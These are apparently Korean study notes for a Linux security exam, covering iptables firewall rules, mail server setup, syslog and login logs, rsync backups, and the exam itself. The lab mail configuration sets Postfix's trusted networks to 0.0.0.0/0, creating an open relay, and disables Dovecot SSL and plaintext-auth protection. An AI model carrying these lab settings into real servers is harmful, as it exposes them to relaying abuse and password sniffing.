    • 도착 포트 22/tcp 허가 (-m tcp --dport22 -j ACCEPT )

  • 룰 정책 - first

    • 룰의 순서 중요
      • -A (--append) : 규칙 추가
      • -P (--policy) : 기본 정책 변경
      • -F (--flush) : chain으로부터 규칙 모두 삭제
      • -D (--delete) : 규칙을 삭제
        • iptables -D FORWARD 1
        • 정책 삭제 시 한칸씩 당겨짐
      • -C (--check) : 패킷 테스트
      • -R (--replace) : 새로운 규칙으로 교체
      • -I (--insert) : 새로운 규칙 삽입
      • -L (--list) : 규칙 출력
        • 자세히보기: iptables -L -v --line
      • -Z (--zero) : 모든 chain의 패킷과 바이트 카운터 값을 0으로 만듬
      • -N (--new) : 새로운 chain 생성
      • -X (--delete-chain) : chain 삭제

  • 장치 및 상태 옵션

    • -s (--source ) : 출발지 IP주소/네트워크

    • -d (--destination) : 목적지 IP주소/네트워크

    • -p (--protocol) : 프로토콜

    • 패킷 볼 때 중요: 출발지, 목적지, 프로토콜

    • 장치

      • -i (--in-interface) : 입력 장치 (내부 장치)
      • -o (--out-interface) : 출력 장치 (외부 장치)

    • 모듈

      • -m (--match) 특정 모듈

        • -m tcp --dport

                    --sport

      • --state : 연결 상태

        ESTABLISHED : 연결이 되어있는 패킷 NEW : 새로운 연결을 요청하는 패킷 RELATED : 기존 연결 이외 다른 새로운 연결 요청 (ex: FTP데이터 전송포트(20/tcp)를 다른 포트로 사용하고자할때 / 꺼지기 전까지는 연결된 상태 유지) INVALID : 어디에도 속하지 않은 패킷

      • --j (--jump): 규칙 적용

      • --reject-with icmp-host-prohibited : 거부하고 ICMP를 금지 ⇒ 다른 호스트로 보내는 ICMP를 허가 X

        • -A INPUT -j REJECT --reject-with icmp-host-prohibited
        • -A FORWARD -j REJECT --reject-with icmp-host-prohibited

• 백업 : iptables-save > /backup/ip.bak

• 초기화 : iptables -F → service iptables-save (저장) → service iptables restart (적용)

• 복구 : iptables-restore /backup/ip.bak

• 정책 enum확인 : iptables -L INPUT --line

• 내부 핑 허용 iptables -A INPUT -i lo -j ACCEPT

• ssh 접속을 위한 옵션 iptables -A INPUT -p tcp --dport 22 -j ACCEPT

• 예제 1. 도착지 X 출발지 패킷만 허용

  iptables -A FORWARD -s 10.10.10.10 -p icmp -j ACCEPT iptables -A FORWARD -s 20.20.20.20 -p icmp -j ACCEPT

  icmp 는 request:8

  reply:0

  • --icmp-type 8
  • -icmp-type 0 칼리에서 서버 ping X 서버에서 칼리로 ping O
  • iptables -A FORWARD -s 10.10.10.10 -p icmp -m icmp --icmp-type 8 -j ACCEPT iptables -A FORWARD -s 20.20.20.20 -p icmp -j ACCEPT (iptables -A FORWARD -s 20.20.20.20 -p icmp --icmp-type 0 -j ACCEPT) service iptables save service iptables restart

• 네트워크 대역 허용

  iptables -A FORWARD -s 10.10.10.0/24 -p icmp -j ACCEPT iptables -A FORWARD -s 20.20.20.0/24 -p icmp -j ACCEPT

• 인터페이스 허용 (모든 포트 개방)

  1. 내부로 연결 허용 (icmp) iptables -A INPUT -i lo -p icmp -j ACCEPT
  2. 외부 iptables -A FORWARD -i ens36 -j ACCEPT iptables -A FORWARD -o ens36 -j ACCEPT
  3. interface > ip > 포트 (icmp,tcp,udp) > -m 모듈

• 예제

  • 전제
    • 기본정책 INPUT= DROP OUTPUT,FORWARD= ACCEPT
    • 내부로 icmp 허용
    • ssh 접속 가능
    • 칼리와 서버는 IPTABLE로 PING 금지 (기본값)
    • IPTABLES 는 칼리 서버 PING 가능 (기본값)
    • 서버는 칼리로 PING 가능 (서버: 10/ 칼리: 20 )
    • 칼리는 서버로 PING 불가
  • 답
    • iptables -P INPUT DROP iptables -P OUTPUT ACCEPT iptables -P FORWARD ACCEPT
    • A INPUT -i lo -p icmp -j ACCEPT
    • A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
    • A FORWARD -p icmp -m icmp --icmp-type 8 -s 20.20.20.20 -d 10.10.10.10 -j DROP service iptables save service iptables restart

• 기본 세팅

  • iptables -A INPUT -i lo -j ACCEPT
  • iptables -A INPUT -p icmp -j ACCEPT
  • iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
  • iptables -A INPUT -p tcp --dport 22 -j ACCEPT

• ip 알리아싱

  ifconfig ens33:0 192.168.10.100 -> ens33:0

• DNAT 세팅

  • iptables -A FORWARD -o ens36 -p tcp -m tcp --dport 80 -j ACCEPT
  • iptables -t nat -A PREROUTING -d 192.168.10.100 -p tcp --dport 80 -j DNAT --to 10.10.10.10:80

• DNAT: 서버

• SNAT: 사설 -> 공인 (인터넷 사용)

• -A FORWARD -i ens32 -j ACCEPT → ens32 를 향해 들어오는 것들 모두 허용

• A FORWARD -o ens32 -p udp -m udp --sport 53 -j ACCEPT → udp/53으로 시작했던 애들만 나갈 수 있게 허용

• A FORWARD -o ens32 -p udp -m udp --dport 53 -j ACCEPT → udp/53을 향해 가는 애들만 나갈 수 있게 허용

• NAT까지 설정된 vi /etc/sysconfig/iptables

    # Generated by iptables-save v1.4.21 on Thu Jun 13 14:34:18 2024
    *nat
    :PREROUTING ACCEPT [210:13992]
    :INPUT ACCEPT [0:0]
    :OUTPUT ACCEPT [2:152]
    :POSTROUTING ACCEPT [12:624]
    -A PREROUTING -d 192.168.10.100/32 -p tcp -m tcp --dport 80 -j DNAT --to-destination 10.10.10.10:80
    -A POSTROUTING -o ens33 -j MASQUERADE
    COMMIT
    # Completed on Thu Jun 13 14:34:18 2024
    # Generated by iptables-save v1.4.21 on Thu Jun 13 14:34:18 2024
    *filter
    :INPUT DROP [0:0]
    :FORWARD DROP [66:4812]
    :OUTPUT ACCEPT [113:14856]
    -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
    -A INPUT -i lo -j ACCEPT
    -A INPUT -p icmp -j ACCEPT
    -A INPUT -p tcp -m state --state NEW -m tcp --dport 22 -j ACCEPT
    -A FORWARD -i ens32 -p udp -m udp --dport 53 -j ACCEPT
    -A FORWARD -o ens32 -p udp -m udp --sport 53 -j ACCEPT
    -A FORWARD -i ens32 -p tcp -m tcp --dport 443 -j ACCEPT
    -A FORWARD -o ens32 -p tcp -m tcp --sport 443 -j ACCEPT
    -A FORWARD -i ens32 -p tcp -m tcp --dport 80 -j ACCEPT
    -A FORWARD -o ens32 -p tcp -m tcp --sport 80 -j ACCEPT
    -A FORWARD -o ens32 -p tcp -m tcp --dport 80 -j ACCEPT
    -A FORWARD -i ens32 -p tcp -m tcp --sport 80 -j ACCEPT
    COMMIT
    # Completed on Thu Jun 13 14:34:18 2024

  외부에서 들어오는 내용만 잘 처리하면 됨 내부에서 나가는것은 이미 신뢰할 수 있는 자료이고 별도의 절차를 거치기에 한줄로 요약 가능

  • A FORWARD -i ens32 -j ACCEPT

  • A FORWARD -o ens32 -p udp -m udp --sport 53 -j ACCEPT

  • A FORWARD -o ens32 -p tcp -m tcp --sport 443 -j ACCEPT

  • A FORWARD -o ens32 -p tcp -m tcp --sport 80 -j ACCEPT

    NAT 지우기 tptables -t nat -F

• 실습

  • 전제 조건

    DNS web db ( 10.10.10.10 ) db.sevas10.com => localhost root '' DB = sevas

    DNS ns.sevas10.com 192.168.10.200 www.sevas10.com 192.168.10.100 으로 접속 fw.sevas10.com 192.168.10.10

    웹페이지 192.168.10.100 (= 10.10.10.10 )으로 접속하고

    (http,https (인증서호스트 www.sevas10.com 포함) 칼리(DNS 192.168.10.200) 에서 web을 사용해서 회원가입 로그인

  • vi /etc/sysconfig/iptables

      # Generated by iptables-save v1.4.21 on Thu Jun 13 16:41:18 2024
      *nat
      :PREROUTING ACCEPT [0:0]
      :INPUT ACCEPT [0:0]
      :OUTPUT ACCEPT [0:0]
      :POSTROUTING ACCEPT [0:0]
      -A PREROUTING -d 192.168.10.100/32 -p tcp -m tcp --dport 80 -j DNAT --to-destination 10.10.10.10:80
      -A PREROUTING -d 192.168.10.100/32 -p tcp -m tcp --dport 443 -j DNAT --to-destination 10.10.10.10:443
      -A PREROUTING -d 192.168.10.200/32 -p udp -m udp --dport 53  -j DNAT --to-destination 10.10.10.10:53
      -A POSTROUTING -o ens33 -j MASQUERADE
      COMMIT
      # Completed on Thu Jun 13 16:41:18 2024
      # Generated by iptables-save v1.4.21 on Thu Jun 13 16:41:18 2024
      *filter
      :INPUT DROP [0:0]
      :FORWARD DROP [0:0]
      :OUTPUT ACCEPT [24:2576]
      -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
      -A INPUT -i lo -j ACCEPT
      -A INPUT -p icmp -j ACCEPT
      -A INPUT -p tcp -m state --state NEW -m tcp --dport 22 -j ACCEPT
      -A FORWARD -i ens34 -j ACCEPT        <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<칼리 인터넷
      -A FORWARD -o ens34 -p udp -m udp --sport 53 -j ACCEPT
      -A FORWARD -o ens34 -p tcp -m tcp --sport 80 -j ACCEPT
      -A FORWARD -o ens34 -p tcp -m tcp --sport 443 -j ACCEPT
      -A FORWARD -i ens32 -j ACCEPT        <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<서버 인터넷
      -A FORWARD -o ens32 -p udp -m udp --sport 53 -j ACCEPT
      -A FORWARD -o ens32 -p tcp -m tcp --sport 80 -j ACCEPT
      -A FORWARD -o ens32 -p tcp -m tcp --sport 443 -j ACCEPT
      -A FORWARD -o ens32 -p tcp -m tcp --dport 443 -j ACCEPT <<<<<<< 서비스 DNAT 포트 
      -A FORWARD -o ens32 -p tcp -m tcp --dport 80 -j ACCEPT
      -A FORWARD -o ens32 -p udp -m udp --dport 53 -j ACCEPT
      COMMIT
      # Completed on Thu Jun 13 16:41:18 2024

  • sevas10.zone

      $TTL 1D
      @       IN SOA  @                       root.sevas10.com. (
                                              0       ; serial
                                              1D      ; refresh
                                              1H      ; retry
                                              1W      ; expire
                                              3H )    ; minimum
              IN      NS      @
              IN      A       10.10.10.10
    
      ns      IN      A       192.168.10.200
      www     IN      A       192.168.10.100
      fw      IN      A       192.168.10.10

• DOS공격 차단 정책 ⇒ ping 속도 제한 ( ping -i 0.1 )

  • -m limit : 적용 검사의 속도 제한 (기본값 5)

  • --limit: /s /m /h /d 등 단위 지정 ex) 3/m => 분당 세 번

  • --limit-burst → 기본 값은 5 , 적용 검사 1회시 한번에 처리하는 최대 패킷수

    • ping 제한

      • 192.168.10.50 의 input 방식 리미트 → ping -i 0.1 192.168.10.100

        -A INPUT -p icmp -m limit --limit 40/min -j ACCEPT -- 일부 승인후 지연(1분에 40개)

        -A INPUT -p icmp -m limit --limit 10/min --limit-burst 10 -j ACCEPT -- 10개 검사 후, 일부 승인 후 지연(1분에 10개)

        -A INPUT -p icmp -m limit --limit 60/min --limit-burst 20 -j ACCEPT -- 일반 ping은 통과, ping 0.1 은 지연을 검

        -A INPUT -p icmp -j DROP -- 이외는 거부 → 마지막에 필수/위의 제한들은 한개씩

• 연결 제한

  • -m connlimit (DROP) [연결세션제한 = 세션수 ]
  • --connlimit-above [숫자]
  • -A INPUT -p tcp --dport 22 -m connlimit --connlimit-above 3 -j DROP

• 로그 남기기

  • -m recent [ 제한 시간 & 허용 카운트 ] 특정 시간 동안 특정 갯수 이상의 패킷을 받으면 적용

  • --update --seconds 5 --hitcount 10 5초 동안 10번 들어오는 패킷들은 차단 (5초 뒤 다시 접속 가능)

  • 웹이 나오게끔 설정 후 동작 ( 10초 동안 10번 들어오는 패킷들을 차단 )

    -A FORWARD -d 10.10.10.10 -p tcp --dport 80 -m recent --set --name flood_list -A FORWARD -d 10.10.10.10 -p tcp --dport 80 -m recent --update --seconds 10 --hitcount 10 --name flood_list -j LOG --log-prefix "[http flood attack]" -A FORWARD -d 10.10.10.10 -p tcp --dport 80 -m recent --update --seconds 10 --hitcount 10 --name flood_list -j DROP

• -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT → 제한은 해당 문구 위에서 진행

• iptables 로그 만들기

  1. vi /etc/rsyslog.conf #IPTABLES kern.* /var/log/iptables.log
  2. service rsyslog restart
  3. tail -f /var/log/iptables.log

• ALL SYN 차단(nmap 등.. SYN ATTACK, flooding)

  • -A INPUT -p tcp -m tcp --tcp-flags SYN SYN -m limit --limit 3/s --limit-burst 5 -j ACCEPT
  • A OUTPUT -p tcp -m tcp --tcp-flags ALL SYN,ACK -m limit --limit 3/s --limit-burst 5 -j ACCEPT
  • A FORWARD -p tcp -m tcp --tcp-flags SYN SYN -m limit --limit 3/s --limit-burst 5 -j ACCEPT
  • A INPUT -p tcp --tcp-flags ALL SYN -j DROP
  • A OUTPUT -p tcp -m tcp --tcp-flags ALL SYN,ACK -j DROP
  • 호스트로 주지 않는 이유: 공격자를 특정할 수 없기에 syn 자체를 막음

1차 시험 및 기본 정보

1차 시험 후기 및 기본 정보는 이전 게시글로 대체합니다. 과목, 시험일정 등

시험

2차 시험의 경우 80문항을 100분 동안 푸는 방식으로 진행됩니다. OMR카드로 작성해야하며 수정테이프 사용은 불가하기에 교체해야합니다. 또한 문제지는 가져갈 수 없고 수험표를 출력해갈 시 뒷면에 답안을 기재할 수 있습니다. 가답안은 2~3일 뒤에 올라오니 미리 채점을 원하신다면 수험표 출력!하시기 바랍니다.

공부 방법

https://www.comcbt.com/ 저는 별도의 교재는 구입하지 않았으며, 해당 사이트에서 21년부터 최근까지의 기출을 반복해서 풀었습니다. 각 2회 이상 푼 뒤에는 모의고사 모드(기출 혼합)로 풀며 모르는 문제는 캡쳐해 따로 남겨두었습니다.

그리고 시험 전날부터 아침까지 반복해서 틀린 문제들에 대해서만 따로 정리를 해두었습니다. 기출이 70%가량 나오기에 반복해서 암기하시는 것이 좋습니다.

• 예시

합격 인증

• mail server

  • 메일 송신 SMTP (메일 서버와 메일 서버 간의 통신) 25/tcp
  • 메일 수신 POP3,IMAP (서버와 클라이언트 수신) 110 , 143
    • pop3 와 IMAP 의 차이점
      • pop3 는 클라이언트에 저장되면 서버에서 내용 삭제
      • IMAP 중앙 서버에서 메일 내용 동기화
  • 리눅스 메일 서버
    • 기본 메일 서버 : POSTFIX (다른 메일 서버 사용 시 삭제)
    • 메일 저장함: /var/spool/mail/계정명

• 메일 관련 프로그램

  • MTA(Mail Transfer Agent)

    • 전자 메일을 다른 곳으로 전송하는 서버 프로그램

  • MUA(mail User Agent)

    • 전자메일을 사용자에게 할당하는 클라이언트 프로그램

  • MDA(Mail Delivery Agent)

    • MTA가 수신한 메세지를 시간에 맞게 사용자 우편한테 쓰기 위한 프로그램

  • MRA(mail Reterieval Agent)

    • 리모트 서버에 있는 우편함으로부터 사용자의 MUA로 메일을 가져오는 프로그램

  • 메일 access 상태

    RELAY 신뢰(Forward) → disconnect 등 정책 설정 가능./ 주로 사용 OK 무조건 허용 DISCARD 응답x 거부 REJECT 응답이 있는 거부

    postfix

yum install mailx yum install dovecot (메일 수신 서버 다운) server dovecot restart (수신 서버 시작) systemctl enable devecot service postfix restart (송신 서버 시작) netstat -lntup |grep dove (포트확인) system-config-firewall (방화벽처리) service postfix restart (송신서버 시작) netstat -lntup |grep master (포트확인)

방화벽 처리 firewall-cmd --permanent --add-port 110/tcp firewall-cmd --permanent --add-port 25/tcp firewall-cmd --reload

최초에는 127.0.0.1:25 기때문에 로컬에서 밖에 수신이 불가하다

• 파일 설정

• /etc/dovecot/conf.d/10-auth.conf (암호화 설정 비활성)

        disable_plaintext_auth = no

• /etc/dovecot/conf.d/10-ssl.conf (SSL 비활성 설정)

        ssl = no

• /etc/dovecot/conf.d/10-mail.conf (메일함설정)

        mail_location = mbox:~/mail:INBOX=/var/mail/%u

• vi /etc/postfix/main.cf (바꿀 내용 /치면서 검색 )

           myhostname = mail.sevas10.com    메일서버 호스트등록
            mydomain = sevas10.com            메일서버 도메인
            myorigin = $mydomain            송신자 메일주소
            inet_interfaces = all            서비스할 인터페이스
            mydestination = $myhostname, localhost.$mydomain, localhost, $mydomain   수신 받을 도메인
            mynetworks = 0.0.0.0/0            신뢰 할수 있는 네트워크 주소
            relay_domains = $mydestination        신뢰 할수 있는 도메인 주소
            mail_spool_directory = /var/spool/mail        메일함 저장 위치
            smtpd_client_restrictions = check_client_access hash:/etc/postfix/access        access list 사용을 위해 추가

• access 설정

        vi /etc/mail/access
        sevas10.com                             RELAY
        10.10.10.254                            RELAY
        20.20.20.254                            RELAY
        10.10.10.10                             RELAY

makemap hash access < access

• DNS내용

        - korea10.zone
  
       $TTL 3H
        @       IN SOA  ns.korea10.com.         root.korea10.com.  (
                                                        0       ; serial
                                                        1D      ; refresh
                                                        1H      ; retry
                                                        1W      ; expire
                                                        3H )    ; minimum
                  IN      NS      ns.korea10.com.
                  IN      A       10.10.10.10
                  IN      MX 15   mail.korea10.com.
  
        ns      IN      A       20.20.20.20
        mail    IN      A       20.20.20.20

• sevas10.zone

       $TTL 3H
        @       IN SOA  ns.sevas10.com.         root.sevas10.com.  (
                                                        0       ; serial
                                                        1D      ; refresh
                                                        1H      ; retry
                                                        1W      ; expire
                                                        3H )    ; minimum
                  IN      NS      ns.sevas10.com.
                  IN      A       10.10.10.10
                  IN      MX 10   mail.sevas10.com.
  
        ns      IN      A       10.10.10.10
        www     IN      A       10.10.10.10
        db      IN      A       20.20.20.20
        mail    IN      A       10.10.10.10

• nslookup

set type=MX sevas10.com Server: 10.10.10.10 Address: 10.10.10.10#53 sevas10.com mail exchanger = 10 mail.sevas10.com. korea10.com Server: 10.10.10.10 Address: 10.10.10.10#53 korea10.com mail exchanger = 15 mail.korea10.com.

꼭 메일 익스체인저 확인할것

• 결과 확인

    [root@localhost ~]# netstat -lntup |grep master
    tcp        0      0 0.0.0.0:25              0.0.0.0:*               LISTEN      11072/master
    tcp6       0      0 :::25                   :::*                    LISTEN      11072/master
    - 내용 적용 `makemap hash access < access`
  
    ---

sendmail

• 패키지 → rpm -e postfix(메일 충돌 이유로 삭제)

                     dovecot   (메일 수신 패키지)  (yum install dovecot)
                     sendmail (메일 서버 패키지) (yum install sendmail*)

• 설정 파일 수정

• vi /etc/dovecot/dovecot.conf

            #protocols = imap pop3 lmtp
            protocols = imap pop3 lmtp
  
            #listen = *, ::
            listen = *, ::
  
            /etc/dovecot/conf.d/10-auth.conf  (암호화 설정 비활성)
            disable_plaintext_auth = no
  
            /etc/dovecot/conf.d/10-ssl.conf (SSL 비활성 설정)
            ssl = no
            :
            /etc/dovecot/conf.d/10-mail.conf (메일함설정)
            mail_location = mbox:~/mail:INBOX=/var/mail/%u

• vi /etc/mail/sendmail.mc

            dnl TRUST_AUTH_MECH(`EXTERNAL DIGEST-MD5 CRAM-MD5 LOGIN PLAIN')dnl    (원본)
            dnl define(`confAUTH_MECHANISMS', `EXTERNAL GSSAPI DIGEST-MD5 CRAM-MD5 LOGIN PLAIN')dnl    (원본)
            TRUST_AUTH_MECH(`EXTERNAL DIGEST-MD5 CRAM-MD5 LOGIN PLAIN')dnl    (수정)
            define(`confAUTH_MECHANISMS', `EXTERNAL GSSAPI DIGEST-MD5 CRAM-MD5 LOGIN PLAIN')dnl    (수정)

            TRUST_AUTH_MECH(`EXTERNAL DIGEST-MD5 CRAM-MD5 LOGIN PLAIN')dnl    
            define(`confAUTH_MECHANISMS', `EXTERNAL GSSAPI DIGEST-MD5 CRAM-MD5 LOGIN PLAIN')dnl

            mail 호스트설정 (125)
            dnl #DAEMON_OPTIONS(`Port=smtp,Addr=127.0.0.1, Name=MTA')dnl    (원본)
            DAEMON_OPTIONS(`Port=smtp,Name=MTA')dnl    (수정)

            도메인등록(169)
            dnl MASQUERADE_AS(`mydomain.com')dnl    (원본)
            MASQUERADE_AS(`sevas.com')dnl    (수정)

            도메인 연결
            dnl FEATURE(masquerade_envelope)dnl    (원본)
            FEATURE(masquerade_envelope)dnl    (수정)

• 저장한 내용 변환 m4 /etc/mail/sendmail.mc > /etc/mail/sendmail.cf
• vi /etc/mail/sendmail.cf

        - Cwsevas10.com

Cw : 호스트 지정. 요즘은 여러 도메인을 사용하는 경우가 많아 Fw가 주로 쓰임 Fw : 도메인마다 별도의 파일을 지정 Dj : 특정 도메인으로 강제로 연결

• vi local-host-names

        - mail.sevas.com  → *지정 도메인 내용 추가*
    - netstat -lntup |grep send
    - netstat -lntup |grep dovecot

• vi /etc/postfix/access

        [aol.com](http://aol.com/)     REJECT
        [yahoo.com](http://yahoo.com/)   REJECT
        [msn.com](http://msn.com/)     REJECT
        자신의 서버 주소 OK

이후 postmap access

• DNS설정

• vi sevas.sh

            S=service
            case $1 in
  
            start)
            echo " 메일 서버 start"
            $S sendmail start
            $S saslauthd start
            $S dovecot start
            ;;
  
            stop)
            echo " 메일 서버 stop"
            $S sendmail stop
            $S saslauthd stop
            $S dovecot stop
            ;;
  
            restart)
            sh $0 stop
            sleep 5
            sh $0 start
            ;;
  
            *)
            echo "start/stop/restart"
            exit 0
            esac

• chmod 755 sevas.sh

• ./sevas.sh

• ./sevas.sh start

• 실행 시 작동

Redirecting to /bin/systemctl start sendmail.service Redirecting to /bin/systemctl start saslauthd.service Redirecting to /bin/systemctl start dovecot.service

• /etc/rc.d/init.d/saslauthd restart (SMTP인증 데몬) /etc/rc.d/init.d/dovecot restart (메일수신 데몬) /etc/rc.d/init.d/sendmail restat (메일서버 데몬)

• 호스트 네임 설정 hostnamectl set-hostname sevas10.com
• 내용 적용 postmap access

• 메일 보내는 방법

  mail root@sevas10.com

  mail [상대방메일주소] subject : [제목쓰기] [내용쓰기] . <<<종료

• 메일 확인하는 방법

    > mail
    번호         선택
    h             메일 정보 확인
    d  [번호]   메일 삭제
    q             나가기
    > 

• alias 설정 (단체 메일)

  • vi /etc/aliases

      # Person who should get root's mail
      #root:          marc
      linux:          sevas,korea
    
    

- 적용 `newaliases`

• 가상 메일

  메일이 변경될 때 등.. 사용

  /etc/mail/virtusertable

    [1차 메일도착(수신안함)]     [2차 목적메일 (수신)]
    root@sevas10.com          sevas@korea10.com
        

  makemap hash virtusertable < virtusertable

  makemap hash access < access

• LOG: 기록 , history , 흔적

• 로그 저장소 : /var/log → 모든 로그 파일 저장소

  • 대부분의 서비스 로그는 /var/log/[서비스명]

• 주요 로그

  • /var/log/message 시스템 메세지 로그 /var/log/secure 인증 로그(접속 로그) /var/log/maillog 메일 로그 /var/log/cron 주기 예약 작업 로그 /var/log/spooler 로그 생성 작업소 (실제 눈으로 확인 어려움) /var/log/dmesg 가장 최근 시스템 장치 및 파일 시스템, 부팅 메세지 로그 /var/log/boot.log 부팅 시 시스템 장치 및 데몬 실행 상태 확인 로그

• 시스 로그 서버 기록

  • logrotate → 모든 로그 파일 관리 (주기적으로 압축, 백업, 삭제, 메일 보내기 등 작업)
    • 역할: 한정된 용량에 로그가 쌓이는 것 방지
    • 구동: crontab > cron.daily > logrotate > logrotate.conf > logrotate.d
    • /etc/logrotate.d/syslog → syslog = rsyslog로 대체 가능

• 접속 로그

  strings : 바이너리 분석 도구 utmp :use: 현재 접속 중인 사용자 : users,w,who wtmp :was: 모든 접속 성공 로그 : last btmp :bad: 모든 접속 실패 로그 : lastb

• utemp

  • 역할: 사용중인 사용자 로그
  • 위치: /var/run/utmp
  • 명령어: w who users finger(잘안씀)
  • 분석:strings /var/run/utmp

• wtmp

  • 역할: 접속했던 계정들의 로그인 로그아웃 정보 로그
  • 위치:/var/log/wtmp
  • 명령어: last

• btmp

  • 역할: 로그인 실패 계정 정보 로그
  • 위치:/var/log/btmp
  • 명령어:lastb (last 명령과 연결되어있음)

• 인증 로그 (secure)

  • 역할: SSH/telnet등 인증(PAM)에 대한 모든 로그 기록
  • 위치: /var/log/secure
  • secure로그는 보통 시스템 메세지 messages와 같이 활용하여 사용

• 웹 접속 로그

  • 접속 로그 /var/log/httpd/access_log <=링크 /etc/httpd/logs/access_log
  • 에러 로그 /var/log/httpd/error_log

• 파일 전송 로그

  • xferlog

    Thu Aug 31 18:00:04 2017 1 192.168.1.1 0 /home/sevas/test a _ o r sevas ftp 0 * c Thu Aug 31 18:00:06 2017 1 192.168.1.1 170 /home/sevas/3.tar.gz b _ i r sevas ftp 0 * c

      Thu Aug 31 18:00:04 2017            날짜
      1                            전송에 걸린시간 (초) 
      192.168.1.1                        soruceIP
      0                            용량
      /home/sevas/test                전송한 파일 경로 
      a/b                            ascii / binary
      _                            압축에 사용된 방식
      o/i                            download/upload
      r                            real account (/etc/passwd)
      sevas                                사용계정명
      ftp                            프로토콜
      0/1                            인증에 사용된 방법 0=none 1=rfc931 remoteident authentication (원격로그인)
      *                                     가능 계정
      c/i                            성공/실패
    
    

• acct/ pacct

  • 시스템에 로그인한 모든 사용자가 로그아웃할 때까지 입력한 명령어와 터미널의 종류, 프로세스 시작 시간 등을 저장한 로그
  • lastcomm 명령으로 확인
  • 리눅스 /var/account/pacct
  • 유닉스 /var/adm/pacct

• 기본적으로 활성화가 되어 있지 않기 때문에 활성화 필수]

  • 리눅스 # accton /var/account/pacct ( 기록 통계를 실행 중지 )
  • 유닉스 # /usr/lib/acct/accton /var/adm/pacct

• 로그 서버 만들기

  • 로그 서버 vi /etc/rsyslog.conf

    주석 해제처리 Provides UDP syslog reception

    #$ModLoad imudp #$UDPServerRun 514 $ModLoad imudp $UDPServerRun 514

    service rsyslog restart

    netstat -lntup |grep rsys 포트확인

    firewall => 514/udp 방화벽열어주기

    logger "메세지" => 서버의 /var/log/messages 에 내용 추가 확인 ssh 로 로컬로그인 => 서버의 /var/log/secure 에 내용 추가 확인

• 로그 클라이언트 설정

  • vi /etc/rsyslog.conf

    원하는정책 설정

  • .info;mail.none;authpriv.none;cron.none /var/log/messages 시스템이벤트로그

    The authpriv file has restricted access.

    authpriv.* /var/log/secure 접속로그

    Log all the mail messages in one place.

    mail.* -/var/log/maillog 메일로그

    Log cron stuff

    cron.* /var/log/cron 크론로그 authpriv.*

  • .* @192.168.10.10:514

• rsyslog

  • service rsyslog restart
  • 클라이언트에서 실행
    • logger "메세지" => 서버의 /var/log/messages 에 내용 추가 확인
    • ssh 로 로컬로그인 => 서버의 /var/log/secure 에 내용 추가 확인

  ---

  authpriv.; user. @192.168.10.10:514 메세지 security.*; @192.168.10.10:514

  • 메세지 type

    authpriv  인증요구 메세지          /var/log/secure
    cron      스케줄러 메세지                /var/log/crond
    daemon    시스템 데몬이 생성한 메세지       /var/log/boot.log
    kern      커널이 발생한 메세지        /var/log/messages
    lpr      프린트 유형이 프로그램이 발생한 메세지
    mail      메일 메세지
    mark      syslogd 데몬에 의해 생성된 주기적인 메세지
    news      뉴스 프로그램 유형이 발생한 메세지
    security  인증 프로그램이 발생한 메세지
    syslog      syslog프로그램 메세지
    user      사용자 프로그램에 의해 생성된 메세지
    uucp      unix to unix copy 시스템이 발생한 메세지
    local 0~7 예약 메세지
    

  • mark를 제외한 모든 메세지

• 레벨 (메세지 타입 레벨)

  0 비상 emergeny 시스템 사용불가정도의 에러 발생 1 경보 alert 시스템에 문제 발생 2 중요 critical 서비스 중단이 필요한 에러 3 에러 error 에러 발생 4 경고 warning 특정 오퍼레이션 이 미완료됨 5 알림 notification 에러는 없지만 상태 변경 6 정보 information 시스템 오퍼레이션 정보 7 디버깅 debuging 장애처리 8 제외 none 제외

• 로그 기록 방법
  • /var/log/messages 로그파일 선택
  • /dev/console 로그기록을 콘솔에 남김
  • user1, root, * 로그기록을 사용자나 모든 사용자에게 남김
  • @IP:포트 로그기록을 특정호스트나 서버에게 남김

rsynk

• rsync 리눅스 백업

  • -a 심볼릭, 속성, 퍼미션, 소유권 보존
  • -v 진행상황
  • -z 전송시 압축
  • -u 새로운 파일 덮어쓰지 않음

• 동기화 옵션

  • --delete : 백업 대상에 이전에 백업한 파일이 없을 시 같이 삭제
  • --progress : 퍼센트 보여줌

• ver 7일 경우

  yum install rsync -y yum install xinetd -y service rsyncd restart netstat -lntup |grep rsync rsync 873/tcp firewall-cmd

• rsync세팅

  • 대상자 설정

    • xinet에서 rsysc 설정

      • vi /etc/rsyncd.conf

        [서버이름] path=/ < 백업할 경로지정 hosts allow= 허용할 IP입력 hosts deny= 차단 IP입력 uid=0 gid=0 파일 없을 경우 생성한다

        service rsyncd restart

- client에서 받아오기 ==(192.168.10.10에서 진행)
    - rsync -avz --progress 서버IP:/경로 ./      [복사할 위치지정]
    or
    rsync -avz --progress --delete 서버IP:/경로 ./ [복사할 위치지정]

• 1분마다 /var/log를 동기화하는 스크립트(15일이 지난 파일은 삭제)

  • mkdir -p /backup/log

  • vi /backup/log/sevas.sh

    #!/bin/bash

    for i in 192.168.10.10 do mkdir -p /backup/log/log_$i date=$(date "+%Y-%m-%d %H시 %M분") echo "" >> /backup/log/log.txt echo "" >> /backup/log/log.txt echo "### ["$i"] / ["$date"] 백업작업 ###" >> /backup/log/log.txt

    echo "" >> /backup/log/log.txt rsync -avz --progress $i:/var/log /backup/log/log_$i >> /backup/log/log.txt find /backup/log/log_$i -ctime +15 -exec rm -rf {} ; done

  • ssh키 인증 로그인

    • (접속을 해야 하는 곳에서) ssh-keygen -t rsa cd /root/.ssh scp id_rsa.pub 192.168.1.10:/root/.ssh/authorized_keys
      chmod 755 sevas.sh

vi /etc/crontab SHELL=/bin/bash PATH=/sbin:/bin:/usr/sbin:/usr/bin */1 * * * * root run-parts /backup/log or */1 * * * * root /backup/log/sevas.sh

• /etc/rc.d/init.d/crond restart

• date 명령

  -d '1 day ago' <====어제 -d '1 day' <====1일후 -d 'this friday' <===이번금요일 -d 'last monday' <===지난 월요일 -d 'next tuesday' <===다음 화요일

• exploit: 컴퓨터, 스마트폰 등 전자 기기에 대한 보안 취약점을 이용하여 해커의 의도대로 공격하도록 설계된 명령, 스크립트, 프로그램
• 공격의 종류
  • 중간자 공격(MITM): Man In The Middle, 통신을 하는 와중에 공격자가 중간에 끼어들어 트래픽을 가로채는 것 - DNS 스푸핑
